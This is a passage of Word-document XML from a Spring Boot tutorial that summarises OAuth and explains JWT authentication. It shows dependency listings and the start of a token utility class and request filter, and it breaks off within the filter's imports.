    <w:p w14:paraId="56819087"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public void configure(AuthorizationServerEndpointsConfigurer endpoints) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43926DF3"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endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390D420"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authenticationManager(authenticationManager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4626A917"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tokenStore(tokenStore());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431AC8C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B564DB" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19EAF1EA"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654F5501"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public TokenStore tokenStore() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7CEDA4"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return new InMemoryTokenStore();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B58418"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C996C8D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E64347" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This is typically used when your Spring Boot app is not just a client but also manages user authentication and issues tokens (e.g., JWT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AFBD68" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4102049D" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1964"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>OAuth is a protocol for authorization that allows third-party applications to access user data without exposing user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0577DFF8" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1964"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, you can integrate OAuth using spring-boot-starter-oauth2-client for handling external OAuth providers (Google, Facebook, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7D3E8" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1964"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps you configure OAuth2 login, manage tokens, and secure endpoints in your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE94892" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1964"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>OAuth flow includes user authentication, access token exchange, and resource access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CD498" w14:textId="56284837" w:rsidR="00844F85" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00844F85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="4B1BBBF0">
          <v:rect id="_x0000_i2159" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94A461" w14:textId="27B0EF0B" w:rsidR="00844F85" w:rsidRPr="00CE4B95" w:rsidRDefault="00844F85" w:rsidP="00844F85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="475" w:name="_Toc196307955"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain JWT in detail in Spring Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="475"/>
    </w:p>
    <w:p w14:paraId="0C0FEFB9" w14:textId="4AFB7784" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="00CF3949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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hat is JWT (JSON Web Token)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C5569"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WT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (JSON Web Token) is an open standard for securely transmitting information between parties as a JSON object. It is widely used for authentication and information exchange because it is compact, URL-safe, and easily verifiable. JWT is often used in stateless authentication, where the server does not need to store session data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091588BF"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JWT consists of three parts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2BB492" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1965"/>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eader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the type of token (JWT) and the signing algorithm (e.g., HMAC SHA256 or RSA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BB0CD3" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1965"/>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yload</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the claims, which are statements about an entity (usually the user) and additional data. Claims can be of three types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E7AE94" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1965"/>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gistered Claims</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Predefined claims like iss (issuer), exp (expiration time), and sub (subject).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2138E2" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1965"/>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ublic Claims</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Claims that can be freely defined by anyone but should be collision-resistant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B901D20" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1965"/>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rivate Claims</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Claims that are shared between the sender and receiver and are not registered or public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA4B77" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1965"/>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ignature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to verify that the sender of the JWT is who it says it is and to ensure the message wasn't tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEDCB02"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JWT structure is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3091B6BD"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ader.Payload.Signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611C2E2D"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re:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1124530F" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1966"/>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eader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is Base64Url encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399330B4" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1966"/>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yload</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is Base64Url encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC04374" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1966"/>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ignature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is generated by signing the header and payload using a secret key or private key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E89FB8" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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JWT in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474422DF"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WT is commonly used in Spring Boot applications to implement stateless authentication. Spring Security provides great support for integrating JWT authentication. Here's how JWT can be used in a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFA945D" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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eps to Implement JWT Authentication in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771A74F8" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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Add Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D064F58"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need to add the following dependencies to your pom.xml (for Maven) or build.gradle (for Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061EC98D"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aven</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6626CCE2"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t;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798EEFD0"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t;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B92E61C"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t;groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92C193"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lt;artifactId&gt;spring-boot-starter-security&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1218F28E"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t;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621DF65E"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t;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32816A9C"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t;groupId&gt;io.jsonwebtoken&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E3C32E"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t;artifactId&gt;jjwt&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C393C1"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t;version&gt;0.11.5&lt;/version&gt;  &lt;!-- Or latest version --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670816FF"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t;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C672435"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t;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE4CA7C"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t;groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338F0F4"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t;artifactId&gt;spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A80AEC8"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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BE2F75"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t;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F7E8F"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Gradle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551712BC"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pendencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71368784"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mplementation 'org.springframework.boot:spring-boot-starter-security'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F9CF42"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mplementation 'io.jsonwebtoken:jjwt:0.11.5'  // Or latest version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3190FE01"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mplementation 'org.springframework.boot:spring-boot-starter-web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D3CD7"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3C3BABA" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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JWT Utility Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF5B5F"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class will handle the creation and parsing of JWT tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C11146"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io.jsonwebtoken.Jwts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C06207"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io.jsonwebtoken.SignatureAlgorithm;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D77D8"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util.Date;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B5005" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE98C49"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JwtUtil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B79667" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C11A4A5"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String secretKey = "yourSecretKey"; // Secret key for signing the JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE5FC65" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7110A035"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Generate JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DEF24A"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ring generateToken(String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7501BD0C"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Jwts.builder()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE7017"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Subject(username)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADF1093"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IssuedAt(new Date())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8BB8A8"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Expiration(new Date(System.currentTimeMillis() + 1000 * 60 * 60))  // Token valid for 1 hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37FC65"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ignWith(SignatureAlgorithm.HS256, secretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA6FBB"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compact();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD25E2"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7A33DD8" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C887324"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Extract username from JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B606AB"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ring extractUsername(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A98C0"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Jwts.parser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832D44B"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SigningKey(secretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61071337"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arseClaimsJws(token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67791A3E"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getBody()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF0A0A1"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getSubject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F0DBD"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8CEEFE9" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D6BF32"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Validate JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71BD41"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boolean validateToken(String token, String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48762328"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username.equals(extractUsername(token)) &amp;&amp; !isTokenExpired(token));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772F8660"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54310B3" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E49EBC"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heck if the token is expired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA67F0"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boolean isTokenExpired(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556253A1"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extractExpiration(token).before(new Date());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F217A"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32424EF" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA98F9C"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Extract expiration date from JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF722A6"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Date extractExpiration(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F91605"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Jwts.parser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE7DE2"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tSigningKey(secretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C00630"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arseClaimsJws(token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BA5D65"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getBody()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9DAC21"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getExpiration();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E14FEB"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62C3D3CB"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0DA10265" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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JWT Filter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E58287"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reate a filter to intercept the incoming requests and check for a valid JWT token in the Authorization header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CD6AD5"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org.springframework.security.core.context.SecurityContextHolder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A88358A"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org.springframework.web.filter.OncePerRequestFilter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A9F89"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x.servlet.Filter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594731A5"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x.servlet.FilterChain;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B486FEB"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x.servlet.ServletException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA5034"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x.servlet.http.HttpServletRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E3BFD1"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x.servlet.http.HttpServletResponse;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2942A878"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java.io.IOException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D45BA83" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
